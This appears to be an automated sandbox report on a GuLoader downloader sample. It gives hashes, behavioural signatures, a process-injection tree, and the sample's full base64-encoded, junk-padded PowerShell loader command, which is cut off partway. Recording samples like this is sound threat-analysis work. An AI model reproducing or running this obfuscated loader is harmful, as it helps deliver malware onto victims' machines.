guloader | 2f8db5f6a186be7d39901927163869def683e80f7d8b9d5fd777686ffaafbafa

General

Target

548s0657610032230b60113125662022file.vbs
Size

139KB
MD5

e6aef31e1dcbce0094da9dcb38a05740
SHA1

fc8d449c85e2701c6dcdd2a07cd69322f7b51dcc
SHA256

2f8db5f6a186be7d39901927163869def683e80f7d8b9d5fd777686ffaafbafa
SHA512

bf41caba7d9970e8675cc48a7157cd4198b48c575ed2735ad3aff7a5bdc75ff57dc82eac6f4bb0ac2211bae260e8383db52607eeadf586f962eb03ae8d43a21d
SSDEEP

3072:05kemg4xDbKe7gDE+AFLnmhi6JZKZFz5TkGZ8CA:Xg4xF7gglmdJZKZFdTkT

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
664	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	664	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 664	1500	WScript.exe	27
PID 1500 wrote to memory of 664	1500	WScript.exe	27
PID 1500 wrote to memory of 664	1500	WScript.exe	27
PID 1500 wrote to memory of 664	1500	WScript.exe	27
PID 664 wrote to memory of 304	664	powershell.exe	29
PID 664 wrote to memory of 304	664	powershell.exe	29
PID 664 wrote to memory of 304	664	powershell.exe	29
PID 664 wrote to memory of 304	664	powershell.exe	29
PID 304 wrote to memory of 1712	304	csc.exe	30
PID 304 wrote to memory of 1712	304	csc.exe	30
PID 304 wrote to memory of 1712	304	csc.exe	30
PID 304 wrote to memory of 1712	304	csc.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\548s0657610032230b60113125662022file.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABHAGUAbgBuAGUAIAA9ACAAQAAnAA0ACgBUAGQAZwBvAGwAQQBmAHUAcwBsAGUAZABUAHIAaQBhAGQAZABPAHYAZQByAGMALQBQAGEAcgBzAGkAVABLAGwAbwBzAGUAeQBLAGEAcgB0AG8AcABIAGUAbQBtAGUAZQBqAG8AcgBkAGIAIABCAGkAbwByAHkALQBTAHkAbgBrAHIAVABTAGUAcgBpAGUAeQBWAHIAZABpAGYAcABQAGgAYQBzAGUAZQBQAGwAYQBuAGkARABvAHYAZQByAHUAZQBCAG8AeABpAGUAZgBTAHkAbgBkAGUAaQBCAHIAbwBtAGQAbgBBAG4AZABhAG4AaQBGAHUAcgBsAGEAdABWAGUAagByAGUAaQBNAGkAbgBlAHIAbwBGAG8AbwB0AGwAbgBTAGUAcwBxAHUAIABHAGwAYQBjAGkAQABUAGEAYgBlAGwAIgAKAFMAdAB2AGwAZQB1AE4AaQBkAGQAaQBzAEYAeQByAGEAZgBpAFUAZABkAGEAbgBuAFIAdQBtAGIAYQBnAFMAZQBsAGUAYgAgAFMAaQBrAGgAZgBTAFAAbwBzAHQAbgB5AEQAaQBhAGwAeQBzAFQAaQBsAHQAYQB0AEgAdQBtAHIAcwBlAE4AYQB0AHQAZQBtAE0AaQBzAG8AYwA7AAoAQQBmAHMAcABuAHUARQBtAHUAbABzAHMAUwBrAGkAcgBsAGkAUABpAG4AdABhAG4ARABhAG4AYgB1AGcAcABvAHMAaQB0ACAAUwBwAGEAZABpAFMAQgBvAHUAcgBnAHkAZwBhAHIAYQBuAHMASABvAG0AZQBiAHQAQgBpAG8AYwBoAGUAZQB4AHQAaQBuAG0AcwBhAG4AZABsAC4ARwBlAG4AbgBlAFIATABpAG4AawB5AHUAUwBrAGEAdAB0AG4ATABlAGcAYQBsAHQAbQBhAHMAcwBhAGkAUwBwAGUAYwBpAG0AUgB1AGIAaQBuAGUAUgBlAGsAbABhAC4ATwB2AGkAcwBwAEkAQgBpAHAAbwBkAG4ATQBhAGwAYQBjAHQAQQBiAGIAYQBjAGUARABkAHMAcwB0AHIAQQBiAHIAYQBzAG8AUAByAG8AZwByAHAASQBuAG8AcABwAFMAQgBpAHMAdABvAGUAUwB0AHkAcgBpAHIAQQBsAHQAaABlAHYARABvAG0AYQBpAGkAQgBhAG4AZABpAGMAQQB4AGkAbwBtAGUASABhAGwAdgB0AHMAVQBuAHAAZQBlADsACgBPAHAAaQBuAGkAcABQAHIAZQBwAHIAdQBEAGEAdABhAHIAYgBTAHUAcABlAHIAbABBAGYAbQBlAGoAaQBKAGkAbgBrAGUAYwBBAHIAYgBlAGoAIABEAGsAcwBtAGEAcwBLAGwAdQBtAHAAdABJAGQAaQBvAG0AYQBWAGkAbAB0AG8AdABNAGEAbAB0AGcAaQBBAG4AaQBsAGkAYwBSAGUAbgBtAG8AIABCAGkAYgBlAGwAYwBJAG4AZABvAHAAbABIAG8AcgBuAHQAYQBVAGQAZABhAG4AcwBGAGwAZQByAHAAcwBIAGUAcwB0AGUAIABNAGUAdABlAG8AQQBUAGEAYwBoAHkAcgBGAGkAbAB0AGUAbQBUAHcAYQBuAGsAYgBWAGEAcgBlAGQAYQBUAHUAYgBlAHIAYQBWAGUAZwBlAHQAbgBFAGwAZQBrAHQAMQAKAFAAcgBlAGUAbAB7AFMAdAByAGEAZgBbAEsAbwBsAGwAZQBEAEEAZABtAGkAbgBsAFMAYwByAGUAZQBsAEIAcgB1AGQAYQBJAFAAZQByAHMAbwBtAEQAZwBlAG4AaQBwAEsAYQByAHQAbwBvAFUAcgB0AGkAYwByAEoAbwBiAGIAZQB0AEsAbwBzAGMAaAAoAGMAbwBuAHMAZQAiAE0AYQBzAGsAZQBrAEkAbQBwAHIAbwBlAE0AbwBuAGEAYwByAEkAbQBwAHIAbwBuAE0AbwBkAHQAYQBlAFMAcABpAHIAaQBsAFUAbgByAGUAYgAzAFMAdwBvAHIAZAAyAEkAbgB0AGUAcgAiAGwAcwBlAHIAcwApAFIAZQBjAGEAcgBdAEIAbABhAHQAdABwAEEAcgBiAGUAagB1AEkAbgBzAHQAcgBiAEYAbAB1AG8AcgBsAEMAbwByAG4AYgBpAHQAcgBzAHQAZQBjAGIAbwBlAHIAbgAgAEUAcwBjAGEAbABzAFAAbwBwAHUAbAB0AHQAcgB1AHMAcwBhAE8AdgBlAHIAbwB0AFMAcAByAHUAZABpAEwAaQBsAGEAaABjAEsAZQBuAGQAaQAgAEkAbgBnAGwAaQBlAHAAaQBsAGUAdQB4AGYAbwByAHMAdgB0AFMAeQBtAGIAYQBlAEUAcgBzAGUAcwByAE0AbQBhAGMAdABuAFUAbgBhAHIAaQAgAGsAcgBhAGIAbABpAEcAeQBuAGkAYQBuAFQAdQBuAGcAbQB0AFMAYQBiAG8AdAAgAEEAbgBvAG0AYQBGAFMAYwByAGUAYQBpAEsAbwBuAHYAbwBuAHMAdAByAGEAZgBkAEQAZQBzAHAAbwBSAE8AcAByAGUAZABlAHMAdQBwAGkAbgBzAEEAcwB0AHIAbwBvAEIAbwBuAGIAbwB1AFAAbwB0AGgAdQByAE4AdQBtAGIAbABjAFAAbABlAHgAdQBlAFMAdQBwAGUAcgBFAFMAbwBsAGQAZQB4AFAAcgBvAGUAZAAoAEQAZQB2AGkAbABpAGsAZQB0AG8AbgBuAFUAbgB2AGkAYwB0AEUAbQBlAG4AZAAgAEMAbwB1AG4AdABPAEIAaQBiAGUAbAB2AHIAYQBkAGkAYwBlAEYAZQBqAGwAdAByAEIAZQBnAHIAbAAsAEsAbwBsAG8AbgBpAGgAYQBsAGwAdQBuAEQAYQB0AGEAcwB0AEMAaQByAGMAdQAgAFMAawBpAHQAcwBUAE4AbwBuAHAAYQBqAEsAaQBsAGUAcgBlAFUAbgBkAGUAcgBuAEkAbgBkAGUAYwBsAEMAbwBsAHAAbwBpAEMAYQBuAHQAaQAsAFMAdABhAGYAZgBpAFMAdAB1AGQAaQBuAEcAdQBtAG0AaQB0AEgAYQB2AGcAdQAgAE8AbQBoAGEAbgBTAE8AdQB0AHcAZQB0AEkAZgBmAHkAYgBhAFAAbwBsAGkAdAAsAFIAbwBlAHIAZQBpAE0AaQBuAGQAcgBuAFQAbwByAHAAZQB0AEsAcgBlAG0AZQAgAFAAcwB5AGMAaABHAEMAaABvAGsAbwB1AFUAbgB0AHIAYQBkAFcAbwBvAGQAYgBzAFMAawBvAHMAdgAyAFQAcgBpAHYAaQAyAFQAYQBwAGEAbAA4AFMAdgBpAG4AZwApAGIAaQBnAGIAYQA7AAoAVABlAG4AdABhAFsASABvAG0AbwBwAEQAQgBhAHIAcwBlAGwARgB1AHMAZQBuAGwAUwBuAGUAcwBwAEkAVABlAG4AZABlAG0AVABlAHQAcgBhAHAASABhAGEAbgBkAG8AQgBpAGwAawBzAHIASwBlAHQAYwBoAHQAUwBvAHIAZQBuACgARgBvAHIAdQByACIAZgBlAGwAbABvAEEASABlAGcAZQBtAEQARABlAGYAZQBjAFYAVABoAGUAYQB0AEEATQB1AHMAawB1AFAAVABlAHIAZQBwAEkAVQBkAGIAYQBuADMAVABpAGQAbABzADIAQgBqAGUAcgBnAC4AcgBlAGgAZQBhAEQATABpAHYAcwBhAEwASwBuAGkAdgBlAEwASwBvAG4AawB1ACIATQBpAHMAcgBlACkATQBiAHUAbgBkAF0AQQBmAGcAaQBmAHAAZwB1AG0AcAB0AHUAVABvAG4AZQBmAGIAQgBvAG4AaQB0AGwAUwBrAGkAbABiAGkASwBvAG4AdAByAGMATQB1AG4AawBzACAAcABvAG0AcABlAHMAVgBhAGcAYQByAHQAVwBlAGIAYgBpAGEAVgBpAGIAagBlAHQAUwBwAHIAdQBkAGkAUABvAG4AYwBhAGMARwBhAG4AZwBiACAAVQBmAGUAagBsAGUAYgBlAHQAbwBuAHgAUwBlAG0AaQBwAHQARgByAGkAcwB0AGUARABlAHQAcgBpAHIAQwBhAG4AZAB5AG4ASABpAG4AdABlACAAQgBpAHQAZQBzAGkAQgBhAGwAbABlAG4AQQBsAHAAZQBuAHQAUgBlAHMAbwByACAAQgBlAHMAdAB5AE8ARABlAHAAcgBvAHAASQBuAHQAZQByAGUARgB1AG0AYQByAG4ATQBpAHMAdABvAFMAUABsAHUAbQBiAEMAVwBoAGUAZQBsAE0ARgBhAGwAcwBrAGEARQBrAHYAaQBwAG4AVQBuAHMAZQBwAGEAVQB2AGkAbABqAGcASwBiAHMAdABhAGUAUwBrAGUAaABlAHIARgBpAGMAdABpACgAVABpAGwAbABvAGkAUwB1AGwAdABlAG4AUABvAHMAbwBsAHQARgBvAHIAcwB0ACAAVAB2AGEAbgBtAGYATwBwAGsAYQBzAGkARgBpAG4AZwBlAHMARgBsAGEAcwBoAGsAUwB1AG0AcAB0AGUAUwBwAGUAcgBtAHIAVAByAGkAdgBzACwAQQBuAG4AYQBsAGkAZgBsAGUAawBvAG4AQQBmAGcAcgBmAHQASABsAHMAcwBlACAAUwB0AGUAcABwAEcAQQBkAGgAZQBzAGEAUwBuAGEAcwBrAGYATwB2AGUAcgBqAGYAQwBoAGEAbgBjACwATABhAGcAZABlAGkARQB2AGEAcABvAG4ASABqAGEAZQBsAHQAQgBpAG0AYQBuACAAUwBrAG8AdABqAEYAQgBvAG8AaABvAGEAUwBuAGEAZABkAGwAQwBhAGYAZgBlAGMASgBvAHQAaQBzAGkAQwB5AHQAbwBnACkAawBpAHIAcwB0ADsACgBTAGUAagByAHMAWwBLAGwAaQBjAGgARABQAHIAZQBoAGkAbABQAGEAcgBlAGQAbABJAG4AcwBwAGkASQBLAGwAYQBkAGQAbQBVAGQAZQBuAG8AcABCAGkAcgBlAGYAbwBUAGUAawBzAHQAcgBOAGUAbwBvAHIAdABMAHkAcwBwAGEAKABVAGQAawBpAGsAIgBMAGkAdgBzAHMAawBGAGMAbwBuAHYAZQBiAHUAbABsAGQAcgBOAGkAYwBrAGUAbgBTAG8AYwBpAGEAZQBuAG8AbgBpAG4AbABCAG8AbQBiAGEAMwBTAG4AZQBkAGkAMgBUAHkAcgBrAGUAIgBTAGwAdQBtAHIAKQBPAHYAZQByAGYAXQBkAGkAawB0AGEAcABSAGkAYwBrAHQAdQBLAGUAcgBhAHMAYgBLAHIAbgBlAG0AbABGAHIAdQBnAHQAaQBQAHIAaQBzAG0AYwBEAGkAYQBtAG8AIABGAGwAaQB0AHQAcwB1AGQAdABhAGwAdABVAHIAYgBhAG4AYQBFAGYAZgB1AG4AdABBAGcAaQB0AGEAaQBVAG4AaQBrAHUAYwBQAHIAaQBzAG0AIABUAGIAcgB1AGQAZQBDAHUAcgBsAHMAeABJAG4AagB1AHMAdABPAG0AcABsAGEAZQBTAGkAcgB1AHAAcgBTAHAAaABlAHIAbgBGAG8AcgBkAGEAIABUAGkAbgBnAGUASQBSAGUAcAByAG8AbgBLAGkAcgBrAGUAdABTAGEAZgBpAGEAUABwAG8AcwBzAGUAdABEAGEAaQBuAHQAcgBTAGsAdQBkAHIAIABGAGUAYQB0AGgARQBEAG8AcgBhAHMAbgBDAGUAbgB0AHIAdQBBAGcAcgBpAGEAbQBIAGEAYQBuAGQAUwBCAHIAaQBuAGsAeQBNAHUAbgBkAGgAcwBNAG8AbgBvAHAAdABiAGEAYQBkAGYAZQBsAGEAawBrAGUAbQBSAGUAawByAHUATABCAGwAdQBmAHIAbwBaAHkAbQBvAG0AYwBKAHUAbABlAG0AYQBFAHMAcABsAGEAbABVAHAAYgBhAHkAZQBMAHIAcgBlAGQAcwBQAGEAcgBhAGYAQQBPAG0AbgBpAGIAKABUAGEAdQBuAHQAdQBFAHIAbwBnAGUAaQBGAGUAbQBlAHQAbgBQAHIAbwB0AGkAdABSAGUAdgBhAGwAIABPAHoAbwBuAGwAdgBQAHUAbABpAGEAMQBFAHUAcABoAHIALABBAHAAcABlAHQAaQBTAHQAaQBiAGkAbgBSAGUAZgBvAHIAdABFAHgAcABvAG4AIABHAHIAYQBtAHMAdgBTAGEAdQBuAGQAMgBJAGwAcwBlAGIAKQBUAG8AdQByAGUAOwAKAEEAbgBrAGUAcgBbAFMAZQBrAHIAZQBEAE4AYQB0AHQAZQBsAFIAZQBjAGUAaQBsAEkAbgBnAGUAbgBJAGgAZQBtAG0AZQBtAE0AYQBjAHUAbABwAFQAYQBuAGcAaQBvAFMAdABpAGwAaQByAFQAYQBsAHYAcgB0AFUAbgBwAGEAcgAoAFUAbgBlAG0AbwAiAFQAcgBvAGwAZABnAFMAbgBiAGUAbABkAFMAbQBpAGcAcgBpAEEAZAB2AGUAcgAzAEoAbwByAGQAbwAyAFUAbgBkAGUAcgAiAEMAaABvAGEAbgApAFYAaQBzAGkAcgBdAEsAbAB1AG0AcABwAEQAYQBtAHAAcwB1AEEAbABwAHUAagBiAEIAbABvAGsAawBsAFUAbgBnAGsAYQBpAEEAZgB0AGwAbABjAHMAeQBuAGEAZwAgAFMAbwBwAHIAYQBzAFMAdABlAG4AaAB0AEEAYQBnAGUAcgBhAEMAYQBsAGUAZAB0AEkAbgBzAGMAcgBpAFAAaABpAGwAaQBjAEUAbgBzAHAAaQAgAEYAaQBkAGEAYwBlAEwAYQB2AG4AaQB4AEsAdQBsAHQAaQB0AEEAcABwAG8AcwBlAGUAdgBhAGsAdQByAHIAZQBwAG8AcgBuAFMAdAByAHUAdAAgAHAAcgBvAGQAdQBpAEkAbgB2AGEAbABuAE0AaQBzAHIAbwB0AFUAZABsAGEAYQAgAEwAbgB1AGQAdgBBAEcAcgBhAGkAbgBiAFAAZQBuAGcAZQBvAFQAZQBvAGwAbwByAG4AbwBuAGQAZQB0AEEAcgB0AGMAcgBQAGEAZABqAGEAZwBhAFYAaQBuAGQAYgB0AFUAbgBjAG8AbgBoAGEAbABsAHUAZAAoAEQAeQBiAHYAYQBpAEkAbgBmAG8AcgBuAGgAZQBsAHQAaQB0AFUAbgB0AGEAbgAgAFUAZAB0AG4AawBTAEIAZQBmAGkAbgBwAEcAYQBmAGYAZQByAGgAagBlAHMAdABpAEEAcgBiAGUAagBuAEkAbgBmAGUAcgBnAEMAaAB1AGcAbQApAEYAYQBsAGQAZQA7AAoAUwBwAGkAZABzAFsARgBlAGwAdABzAEQAQgByAGUAZABiAGwAUwBuAHUAcgByAGwAUwBtAGEAcgB0AEkAVgBhAGwAdQB0AG0ARABhAHIAawBlAHAAQQByAGkAcwBlAG8ARgBhAGMAcwBpAHIAVABlAGsAcwB0AHQAVQBuAGQAZQByACgARgBpAHMAYwBoACIAQgBsAHUAaQBuAGsAUABhAGwAdAByAGUAUABuAGUAdQBtAHIARQBsAHYAZQByAG4ASABhAG0AbQBlAGUARQBxAHUAYQBiAGwARgBlAGEAbAB0ADMAdQBkAGgAdQBzADIAQQB0AHIAbwBwACIARgBqAGUAcgB0ACkAUwBwAGUAbgBkAF0ATQB1AHMAZQB1AHAARABhAHkAbQBhAHUARwBhAG0AbwBkAGIASABpAHQAdABlAGwAVQBpAGcAZQBuAGkAUwB0AHUAcABwAGMAQQByAGIAZQBqACAASABlAGEAcgB0AHMASQBuAGMAcgBlAHQATQBhAGcAbgB1AGEAVQB0AGEAawBuAHQAUwBrAG8AdgBiAGkAUwBrAHIAaQB2AGMAUwB1AHAAcABsACAAVAByAHkAbABsAGUATQBvAGQAZQByAHgAUwB0AHIAbQBmAHQAUwBrAHkAbABkAGUAUwBwAGUAYwBpAHIAbgBvAG4AcAByAG4AaQBuAGQAcAByACAAQQBuAGcAbwBsAGkAZQBuAGUAZwBuAG4AUAByAGUAdABlAHQASQBuAGQAawBvACAAUwB0AHIAYQBuAFYARgBvAGQAYgBvAGkAVgBvAG0AaQB0AHIASQBuAGYAaQBuAHQAWgBpAG4AZQBiAHUARAB5AG4AYQBtAGEAQgB5AGcAZwBlAGwAUgBhAGEAagBvAEEAUwBrAHIAbQB0AGwASABvAHYAZQBkAGwAUABsAGUAdABmAG8AVwBlAG4AZABhAGMARQBjAHQAbwBwACgATABpAG4AbwBsAGkAQwBvAGwAbwBiAG4AVgBpAHIAawBzAHQAUgBhAGQAaQBvACAAUwBhAGcAdABtAHYATABlAHYAZQB2ADEAVAByAG8AbQBtACwAUABvAGkAdAByAGkAVQBuAGYAbABhAG4AVAB2AGEAbgBnAHQASABhAGUAbQBvACAAUAByAG8AaQBtAHYAUwBhAG4AZABzADIARgBpAGwAYwBoACwASQBuAGQAcwB1AGkAUwB0AGEAbABpAG4ARAB5AHIAZQB0AHQARgB1AHIAcgB1ACAAUwBjAHIAYQBnAHYAQwBvAG4AcwBpADMARgBvAHIAdAByACwAVwBpAHQAdAB5AGkATABvAGgAYQByAG4AUwB5AGQAZQBhAHQARgBsAG8AdABzACAATgBvAG4AdABoAHYAVQBkAGcAbABhADQARwBsAHUAbQBwACkATgBpAG8AYgBpADsACgBLAHYAYQBsAGkAWwBEAGUAcgBuAGUARABpAG4AZAB0AGcAbABmAGEAbABzAGUAbABFAHMAcwBlAG4ASQBNAGEAcgBjAGkAbQBFAHIAaAB2AGUAcABVAHQAbwBwAGkAbwBTAGUAdgBlAG4AcgBHAG4AbwBzAHQAdABDAGUAbABlAGIAKABCAGwAYQBuAGQAIgBzAHYAYQBsAGUAawBQAGEAcgB0AGkAZQBQAHIAZQBjAG8AcgBFAG4AZQBnAGEAbgBJAG0AcAByAGUAZQBDAGEAcgBvAGwAbABTAHUAegBhAG4AMwBTAHUAcABlAHIAMgBlAG0AYgBvAHMAIgBDAGgAYQBsAGkAKQBnAHIAZQBlAG4AXQBLAGEAZABlAHQAcABQAGgAYQBlAHQAdQBNAGkAcwB0AG4AYgBBAGwAdgBlAG8AbABrAGUAbABsAHkAaQBFAHIAZwBvAG4AYwBNAGUAbgBpAGcAIABUAHIAYQBuAHMAcwBJAGwAbQBhAHIAdABKAG8AdQByAG4AYQBLAGEAdABhAGwAdABLAG8AcgByAGUAaQBTAHUAYgBqAG8AYwBLAGEAbABkAHMAIABTAGEAbAB1AHQAZQBOAGUAdAB0AG8AeABXAGEAdABlAHIAdABqAGUAbgBrAHIAZQBGAHUAbQBhAHIAcgBMAGkAdABoAGUAbgBLAGEAbgB1AHIAIABTAGkAZwBmAHUAaQBBAG4AdABoAGUAbgBUAHIAbwBtAG0AdABQAHIAbAB1AGQAIABFAG0AYQBjAGkARwBUAGgAcgBlAHMAZQBSAGUAaABvAG8AdAByAGEAYQBkAHYAUABSAGUAZABlAGYAcgBMAG8AcgBuAG4AaQBCAGUAbgBiAHIAdgBkAHkAcgBlAGgAYQBFAHIAZQBjAHQAdABSAGUAZQB0AGEAZQBTAGUAcgBtAG8AUABVAG4AbABpAHMAcgBHAGEAcwB0AGUAbwBCAGgAdQB0AGEAZgBPAHAAcwBsAHUAaQBBAGwAbABlAHIAbABTAGsAYQBtAGYAZQBUAHcAbwBzAHQASQBUAHIAbwBuAGYAbgBwAG8AbABpAHQAdABhAGMAYwBlAG4AKABSAGUAZABzAGgAaQBQAGwAaQBtAHMAbgBhAHIAZABlAGkAdABFAGYAdABlAHIAIABSAGUAdgBpAHMAVABQAGEAdgBlAGQAaABVAG4AYwBvAG0AZQBQAGEAdABlAG4AbABEAGkAcwB0AHIAZQBSAG8AcwBlAGkALABtAGkAcwBtAGEAaQBVAG4AZABlAHIAbgBGAG8AbABrAGUAdABVAG4AZABlAHIAIABQAGEAbABzAHQAVQBGAG8AcgBuAHkAcwBNAG8AcABlAGQAawBCAHUAdABhAG4AaQBJAG4AZABpAHYAawBCAHIAZQBuAGUALABTAGEAbgBkAHcAaQBBAGcAZwByAGUAbgBSAGkAcwBpAGIAdABJAHIAcgBpAHQAIABSAGUAZQBtAGkAQwBNAGEAbgBzAHMAYQBCAGEAdQB4AGkAcgBNAGEAaQBuAHMAYQBTAHkAbgBhAGcAbQBEAGUAcwBtAGUALABRAHUAaQBwAGYAaQBTAGsAcgBiAGsAbgBFAG4AZQBiAG8AdABTAGUAbABlAGYAIABTAG0AcgBrAGEAUwBFAHMAawBhAGQAdQBOAG8AbgBzAGMAcABUAGUAaAB1AHMAcgBmAG8AcgB2AGEAKQBVAG0AYgByAGEAOwAKAFUAbgBkAGUAcgBbAEMAbwBtAG0AdQBEAFIAZQBpAG4AbwBsAEcAZQBsAGkAawBsAFYAYQByAGkAZQBJAFMAYwBvAHIAcABtAEkAbQBiAHIAZQBwAEcAbwB5AGkAbgBvAFAAcgBnAGUAbgByAE4AZQBkAGUAcgB0AFMAZQBsAGkAYwAoAFAAbwBzAHQAZQAiAFYAYQByAGUAZAB1AEMAbABlAGEAcgBzAEsAbwBuAHQAaQBlAEsAYQBuAG8AbgByAEIAaQBtAHAAbAAzAEEAbgB0AGkAYwAyAEEAZwB0AHMAbwAiAEQAZQBsAG8AcAApAE4AZQBkAHMAaQBdAEwAaQBiAGUAcgBwAEYAcgBkAHMAZQB1AEMAbwByAHIAbwBiAFMAawBvAGwAZQBsAEgAbwBuAG8AdQBpAE0AdQBsAHQAaQBjAEMAbwBzAG0AdQAgAEcAbABpAG0AbQBzAFMAYQBtAHQAYQB0AEIAYQByAGEAbABhAE8AcgBrAGkAZAB0AEsAYQBuAHQAYQBpAEkAbgB0AGUAcgBjAEIAcgBvAG8AawAgAEsAYQBzAHMAZQBlAEMAcgBlAHQAaQB4AEkAbwBjAHMAcAB0AEoAYQBmAGUAdABlAEMAbwB1AHAAYQByAFQAYQBiAGwAZQBuAFIAZQBjAGUAbAAgAEYAcgBlAG0AYgBpAFMAaQB0AGQAbwBuAEwAbwBiAGEAbAB0AFYAYQByAG0AZQAgAEcAbwB1AHQAaQBHAEQAcgBhAHUAZwBlAEUAbgB0AGUAcgB0AFQAcgBhAG4AcwBTAEEAbgBlAHMAYwBjAGIAYQB0AG0AYQByAHMAawB5AGcAZwBvAEkAbgBkAGgAZQBsAEEAZABmAHIAZABsAEIAdQByAHAAcwBSAFMAdABqAGYAbwBhAFAAcgB2AGUAbABuAFIAZQBpAG4AcwBnAE4AbwBuAGEAbABlAEkAbgBjAGEAcAAoAFUAbgByAGUAcwBpAEwAZQBzAHQAbQBuAEwAcgBlAHAAbAB0AEIAYQBnAHQAdQAgAEgAbwB2AGUAZABIAHUAbgBoAHUAZwBhAFUAbgByAHUAYgBhAE0AaQBzAGYAbwBiAEYAYQBuAGUAbQBzAEUAbgBrAGUAbQAxAE0AbwBuAG8AYwAwAEMAeQB0AGgAZQA4AEEAZgBkAGEAbgAsAFIAZQBwAHIAYQBpAEQAYQBtAGEAcwBuAEUAawBzAHAAYQB0AEcAbABhAHMAcwAgAFMAcABsAGkAbgBGAE4AbwBuAGgAZQBpAGYAaQBsAGEAbQBsAEwAaQB2AHMAbgAsAEMAbABpAHQAZQBpAFUAbgBkAGUAcgBuAFMAYwBhAHUAcgB0AE0AdQBuAGkAYwAgAFIAYQB3AGgAaQBEAEsAdgBnAHQAZQBpAG4AbwBuAG0AYQB2AEsAaQB0AGIAYQBpAEsAbwBuAGQAbwBkAEQAbwBtAGIAbwAsAE0AZQB0AGEAdABpAFQAZQB0AHIAYQBuAEIAYQBnAGYAbAB0AEkAbgBkAHUAcwAgAFQAbwBiAHkAZABUAEgAbwBsAGQAdABvAEQAZQBjAG8AZABzAE4AbwBuAGQAaQBzAHMAaQBnAG4AYQBlAEQAZQByAGkAdgApAHMAbABnAHQAZQA7AAoAUwB0AGIAZQBsAH0ACgBTAGgAZQB0AGwAIgBUAGUAcwBrAGUAQAAKAFIAZQBrAHIAdQAkAFAAcgBlAGUAbABBAFQAYQBvAGkAcwByAGEAcABvAHQAZQBtAEsAbgBsAGUAbgBiAFIAYQBwAHMAZgBhAEYAZQByAGkAZQBhAE0AYQB0AGUAcgBuAEQAZQB0AHIAbwAzAEQAZQBtAHkAdAA9AFIAZQBhAGwAZQBbAEcAeQBuAG8AcwBBAHQAeQB2AHMAdAByAEIAbwBvAGsAbQBtAFMAYQBsAGcAcwBiAEUAZgB0AGUAcgBhAEsAaQBsAG8AcgBhAFUAZABzAGsAcgBuAEYAbwByAHMAawAxAFAAcwBvAHIAYQBdAFYAYQByAHMAbwA6AE4AbwBzAG8AZwA6AEEAbQBhAHIAeQBWAFMAcABhAHIAcgBpAFQAbwByAGMAaAByAEsAYQBtAGUAbAB0AG8AbQBmAGEAbgB1AFQAcgBsAGcAbgBhAFQAaQBtAG8AdABsAEIAbABpAHQAaABBAFMAZQBhAG0AeQBsAFMAbwBsAHYAYQBsAEIAYQBjAGEAdQBvAEEAbgB0AGkAcgBjAEgAagBlAHIAdAAoAFIAYQB0AGkAZgAwAEcAdgBpAG4AawAsAE4AYQByAHIAYQAxAFUAZABwAHUAbgAwAFAAcgBvAGMAZQA0AFAAdQByAHAAdQA4AEwAdQBuAGMAaAA1AEMAaQBsAGkAaQA3AGQAZQB2AGEAcwA2AFkAbwBiAGIAbwAsAFUAcABnAGEAegAxAEEAbABiAGkAbgAyAE0AZQB0AG8AZAAyAFIAYQBjAGgAaQA4AFcAaQBuAGQAcwA4AE8AdQB0AHIAYQAsAEYAbwByAGYAZwA2AGQAZQBtAG8AawA0AFAAcgB2AGUAdAApAAoASABhAHYAYgBsACQARwBlAGwAYQBiAE0AUwB0AGUAcgBjAHkASQBuAGsAYQBzAHQAQgBlAHQAYQBnAG8ARwBlAHMAdABhAD0AQgBlAGYAbwB1ACgAQwBhAHMAdABvAEcAUgBlAGQAZQBhAGUATgBvAG4AcwB1AHQARABpAGcAaQB0AC0AUwBvAGwAZABhAEkAQQBmAHAAaQBsAHQATgBvAHQAZQByAGUATQBpAG4AdABpAG0AbQBvAG8AcwB0AFAATgBvAHQAZQBzAHIARQB4AGMAYQBtAG8AUgBpAGMAaABhAHAAQQB1AGcAdQBzAGUAUwBlAGwAZQBrAHIAVABvAHAAbQBhAHQAUwBrAGkAYgBzAHkAdABpAGwAZgByACAAUgBlAGEAdQBtAC0AUwBvAG4AbwByAFAAVQBkAGQAYQBuAGEAQQB1AGcAdQBzAHQAWQBvAHUAbgBlAGgAQQBuAHQAaABvACAAQgBlAGsAdgBlACIAUwBwAG8AcgByAEgAVQBuAHMAZQBjAEsAUwBwAGQAbABlAEMATQBhAG4AdQBhAFUAYgBlAHMAawBqADoARgBvAHIAbABpAFwAUgBhAGkAbgBiAFMAUgBlAGEAbQB1AG8ARQB4AHAAcgBlAGYASwBuAG8AbABkAHQAUwBhAG0AbwB1AHcATgBlAGQAdgByAGEAUgBlAHMAbgBlAHIASwBhAGoAYQBzAGUARABlAHQAcgBpAFwAVwBvAG8AbABzAE8AVABhAGwAZwBzAHMAVQBuAGYAYQBiAHQATQBhAHUAbgBjAGUAUwB0AGUAdABpAG8AUwBvAGwAZAByAGQATQBlAGwAaQBzAGkAYgB5AGcAZwBlAGEAUAByAGUAZABlAHMAUwB1AGwAawBlAHQASABhAHYAZQBtACIATgBkAHIAaQBuACkAQQBsAGUAeABpAC4AUwB0AGEAYgBsAHUARwBzAHQAZQBuAG4AUwBrAHIAaQBmAGcAVQBuAGUAeAB0AGUATwBjAGMAYQBzAGwACgBGAGwAZABlAG4AJABIAGEAcgBlAHcATwBFAGYAdABlAHIAcABGAHkAbABkAG4AbQB2AGkAbgBkAGkAYQBDAGkAcwBlAGwAYQBCAHIAbwBrAG8AbABNAG8AbgBvAHAAYgBBAGwAcABoAHkAYQBTAHUAZwBnAGUAIABQAGEAcgBhAG0APQBCAGUAcwB2AHIAIABPAHAAdABpAG0AWwBMAGEAbgBkAGIAUwBGAHIAYQBuAGMAeQBzAHAAbgBkAGUAcwBWAGEAbgBuAHUAdABJAG4AZgBsAGEAZQBTAGUAZABkAGUAbQBGAG